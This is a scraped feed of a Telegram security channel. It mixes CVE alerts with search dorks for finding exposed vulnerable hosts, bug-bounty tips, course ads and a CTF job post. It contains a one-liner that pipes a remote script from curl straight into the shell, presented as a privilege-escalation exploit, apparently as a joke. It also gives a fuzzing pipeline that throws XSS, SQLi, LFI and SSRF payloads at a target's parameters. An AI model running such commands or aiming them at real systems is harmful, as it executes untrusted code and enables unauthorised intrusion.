Brut Security
14.9K subscribers
953 photos
76 videos
290 files
997 links
βœ…DM: @wtf_brut
πŸ›ƒWhatsApp: https://wa.link/brutsecurity
🈴Training: https://brutsecurity.com
πŸ“¨Mail: [email protected]
Download Telegram
☺️Your support keeps me motivated to share more valuable content! If you found this helpful, drop a like & send stars ⭐ to help me keep going.

πŸ’¬ For queries, message me on Telegram: @wtf_brut
πŸŽ“ For course enrollment, reach out on WhatsApp: wa.link/brutsecurity
3❀13πŸ‘8🐳3πŸ”₯2
CVE-2025-1974: Improper Isolation or Compartmentalization in Kubernetes Ingress Controller, 9.8 rating πŸ”₯

In some cases, an unauthenticated attacker may be able to execute remote code in the context of the ingress-nginx controller.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/G6SC7
πŸ‘‰ Dork: certificate.issuer_dn:"Kubernetes Ingress Controller"

Vendor's advisory: https://github.com/kubernetes/kubernetes/issues/131009
πŸ‘10🀝2❀1
🀣59πŸ‘8😁2🀝2
πŸ” Ultimate Secret Scanner Regex Collection πŸ”

30+ regex patterns to detect leaked credentials:

βœ… API keys (Google, AWS, Stripe)
βœ… Auth tokens (OAuth, JWT)
βœ… Private keys (RSA, PGP)
βœ… Emails, URLs, UUIDs

https://github.com/Lu3ky13/Search-for-all-leaked-keys-secrets-using-one-regex-/tree/main

#bugbounty #bugbountytip
πŸ‘14πŸ—Ώ12❀2
This media is not supported in your browser
VIEW IN TELEGRAM
πŸ’₯Join Our Discord ServerπŸ’₯

πŸ€–
https://discord.gg/u7uMFV833h πŸ€–
❀6
This media is not supported in your browser
VIEW IN TELEGRAM
Google Dorks that can be used for penetration testing, security research, and information gathering.

https://github.com/yogsec/Pen-Testing-Google-Dorks
❀11πŸ”₯5πŸ‘3
This media is not supported in your browser
VIEW IN TELEGRAM
Plzzz...
🀣45πŸ‘4πŸ”₯2😒2
πŸ”₯ Web Pentesting & Bug Bounty Batch – Starting April!

Master Web Penetration Testing with a Bug Bounty Approach in our new batch starting this April! Learn real-world attack scenarios, exploitation techniques, and defense strategies.

βœ… Weekday & Weekend Batches – Evening Slots (IST)
βœ… Hands-on Labs & Live Automations
βœ… Bug Bounty Methodologies & Practical Hunting
βœ… Community Support & Private POC Access

πŸ“© Limited slots! Enroll now and take your hacking skills to the next level.

πŸ“± DM https://wa.link/brutsecurity for details! (https://wa.me/+918945971332)
❀9πŸ‘3πŸ”₯3
✨Eid Mubarak to the Brut Security Community!✨

On this special occasion, we extend our warmest wishes to all who celebrate Eid. May this day bring you joy, peace, and prosperity.

At Brut Security, we value diversity and unity, and we appreciate each and every member of our community. Whether you’re celebrating or simply sharing in the happiness of others, we hope today is filled with kindness and togetherness.

Stay curious, stay secure, and keep learning!

🀍Brut Security🀍
Please open Telegram to view this post
VIEW IN TELEGRAM
❀57πŸ‘5🐳2🀣2
CVE-2025-2294: Path Traversal in Kubio WordPress plugin, 9.8 rating πŸ”₯

A vulnerability found in a popular plugin allows unauthenticated attackers to execute any code in PHP files on the server.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/iOqr6
πŸ‘‰ Dork: http.body:"plugins/kubio"

Read more: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kubio/kubio-ai-page-builder-251-unauthenticated-local-file-inclusion
πŸ‘6πŸ”₯3
Big bounty tips ✨️ - CRLF injection

#bugbounty #bugbountytips
πŸ‘19πŸ‘6
APIs Fuzzing for Bug Bounty.pdf
164.9 KB
πŸ”₯15πŸ‘6❀2πŸ€”2
πŸ’₯CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):
β€œ. <(curl -SsfL https://thc.org/7350pipe)”
🀣29πŸ—Ώ14😁2❀1
πŸ”₯ Discover Web Vulns Like a Pro! πŸ”₯
Want to hunt XSS, SQLi, LFI, and SSRF on any site? Here’s a killer one-liner I’ve been using:


gau target.com | gf xss,lfi,sqli,ssrf | qsreplace FUZZ | ffuf -u FUZZ -w payloads/xss.txt,payloads/lfi.txt,payloads/sqli.txt,payloads/ssrf.txt -fr "FUZZ" | tee param_vulns.txt



What’s it do?
1️⃣ Grabs URLs: gau digs up every URL for
target.com from the web’s archives.
2️⃣ Finds Weak Spots: gf filters for params ripe for hacking (XSS, SQLi, etc.).
3️⃣ Sets the Trap: qsreplace swaps values with FUZZ for testing.
4️⃣ Fuzzes Hard: ffuf blasts payloads from my custom listsβ€”XSS popups, file leaks, you name it!
5️⃣ Saves the Loot: Results land in param_vulns.txt for you to exploit.


πŸ’‘ Pro Tip: Add -t 50 to ffuf for speed, or -fc 404 to skip dead ends. Test responsibly!

Curious about hacking tricks like this? Join my crew at
https://discord.gg/u7uMFV833h for more tools, tips, and chaos. Dr
πŸ‘19❀8πŸ—Ώ8
😍
🀣48😱5
CVE-2025-3083, -3084, -3085: Vulnerabilities in MongoDB, 6.5 - 8.1 rating❗️

Vulnerabilities in some versions of MongoDB allow attackers to perform DoS and gain unauthorized access using revoked certificates.

Search at Netlas.io:
πŸ‘‰ Link: https://nt.ls/aqCrV
πŸ‘‰ Dork: mongodb.build_info.version:[6.0.0 TO 6.0.20] OR mongodb.build_info.version:[5.0.0 TO 5.0.31] OR mongodb.build_info.version:[7.0.0 TO 7.0.16]

Vendor's advisory: https://jira.mongodb.org/browse/SERVER-95445
πŸ‘3
Let's have some fun 🀩
πŸ”₯14πŸ‘4
Freelance Security Analyst for CTF Challenge

Job Type: Freelance | Remote | Short-term

We need an experienced cybersecurity professional to assist with a CTF challenge. Must be skilled in:
βœ” Web Exploitation, Reverse Engineering, Cryptography, Forensics, OSINT
βœ” CTF platforms (Hack The Box, TryHackMe, PicoCTF, etc.)
βœ” Tools like Burp Suite, Wireshark, Ghidra, IDA Pro, Metasploit
βœ” Ethical hacking & exploit development (OSCP, CEH preferred)

πŸ“© Send your resume to
[email protected] or WhatsApp +91-8016167754.

Let’s solve this challenge together!
πŸ‘15❀6
Brut Security pinned Β«Freelance Security Analyst for CTF Challenge Job Type: Freelance | Remote | Short-term We need an experienced cybersecurity professional to assist with a CTF challenge. Must be skilled in: βœ” Web Exploitation, Reverse Engineering, Cryptography, Forensics…»
Use TLSx to detect certificate misconfigurations πŸ”

Use this command to check for expired, self-signed, mismatched, revoked AND untrusted certificates πŸ‘‡
Please open Telegram to view this post
VIEW IN TELEGRAM
πŸ”₯46πŸ‘2